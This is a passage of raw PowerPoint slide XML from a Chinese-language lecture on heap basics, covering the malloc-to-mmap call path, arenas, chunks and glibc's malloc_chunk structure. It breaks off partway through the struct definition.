                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{035D7C96-DD7C-43D0-B1BF-2D22E3F751A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="15" idx="2"/>
            <a:endCxn id="16" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3609242" y="4985897"/>
            <a:ext cx="0" cy="441807"/>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F9A8E815-FED5-4F05-8E54-3D044EED2DAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6866792" y="4094285"/>
            <a:ext cx="2171700" cy="891612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">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__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mmap</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EECB23D1-6A0A-445A-8DD5-246D9C33C44B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6866792" y="5427704"/>
            <a:ext cx="2171700" cy="891612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sys_mmap_pgoff</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直接箭头连接符 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAC94D23-3203-4B44-AD12-3F2B931CB8D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="18" idx="2"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7952642" y="4985897"/>
            <a:ext cx="0" cy="441807"/>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9E8605CC-3792-40EE-8A71-ABA55B756224}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="8" idx="1"/>
            <a:endCxn id="15" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3609242" y="3098072"/>
            <a:ext cx="1085850" cy="996213"/>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6E1F5481-D9D7-4885-93FB-0C773DC2E084}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="8" idx="3"/>
            <a:endCxn id="18" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6866792" y="3098072"/>
            <a:ext cx="1085850" cy="996213"/>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130A99F5-EC69-4E59-B505-1596B3AD8EC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7008314" y="1441487"/>
            <a:ext cx="2287806" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>System independent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>application code</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="文本框 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C87CC7C5-A993-4186-B1A5-431C481BF2E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7266222" y="2782669"/>
            <a:ext cx="2287806" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>System independent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>library code</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="文本框 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C68AE16C-E114-4E0C-8EAB-BB0BDED56ECC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9245114" y="4216925"/>
            <a:ext cx="2980303" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>System independent library</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>code to trap to kernel</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="文本框 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8380084-43C7-4294-BC5E-3390350F98AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9319493" y="5651181"/>
            <a:ext cx="1415772" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Kernel code</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="矩形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AB23002-1E54-438D-B1DB-D6CB03CEAE08}"/>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堆概述</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3868890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3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A1F7AC9-3502-47B0-A3C3-3E2980746230}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3358719" y="3054320"/>
            <a:ext cx="6096000" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>内存分配区，可以理解为堆管理器所持有的内存池</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>堆管理器与用户的内存交易发生于arena中，可以理解为堆管理器向操作系统批发来的有冗余的内存库存</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38B07BB0-1C0A-4F04-9311-8E555AF67B37}"/>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arena</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58A08056-F93F-446F-BCEE-F4BBEAFBFA35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2275630" y="1957072"/>
            <a:ext cx="1336841" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>arena</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1"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99C94CFC-A477-4D10-B09D-935E70B991FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3358719" y="3438931"/>
            <a:ext cx="6096000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>操作系统 --&gt; 堆管理器 --&gt; 用户</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>物理内存 --&gt; a r e n a  --&gt; 可用内存</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg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874443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pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C41CFCB-9DDA-4334-A75C-60D9AB162EB6}"/>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65429" y="0"/>
            <a:ext cx="9061142" cy="6795857"/>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CC6D244A-9781-420A-B6C5-0238431B279E}"/>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堆概述</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59618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07C3B8-10D3-478D-A4AD-39BFBD97F17E}"/>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1132782" y="944407"/>
            <a:ext cx="9926435" cy="5458587"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{830F8F2F-B7A8-459D-B16F-F6D68325B598}"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>进程虚拟地址空间</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292857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4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F79104FD-1E06-4D2A-A36D-ACF43B416EC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2905957" y="2528788"/>
            <a:ext cx="6096000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>用户申请内存的单位，也是堆管理器管理内存的基本单位 malloc()返回的指针指向一个chunk的数据区域</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE718175-6D55-4E7B-AD94-3DACCF3AD0CE}"/>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3054704" y="3709018"/>
            <a:ext cx="5114925" cy="2209800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB5C8C3A-53BA-41DF-ACCF-047C2E2F02AA}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D780E74-BD47-4AEE-94DA-FDE51D950314}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5107619" y="1410114"/>
            <a:ext cx="1692676" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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892395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9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AD8D2B1-0D03-4644-9E81-AF8C3F010851}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623047" y="2704745"/>
            <a:ext cx="10945905" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="267F99"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malloc_chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>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INTERNAL_SIZE_T      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>prev_size</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 Size of previous chunk (if free).  */</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INTERNAL_SIZE_T      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>size</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 Size in bytes, including overhead. */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="267F99"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malloc_chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</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 double links -- used only if free. */</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struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="267F99"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malloc_chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:b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 Only used for large blocks: pointer to next larger size.  */</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struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="267F99"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malloc_chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd_nextsize</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 double links -- used only if free. */</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struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="267F99"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malloc_chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
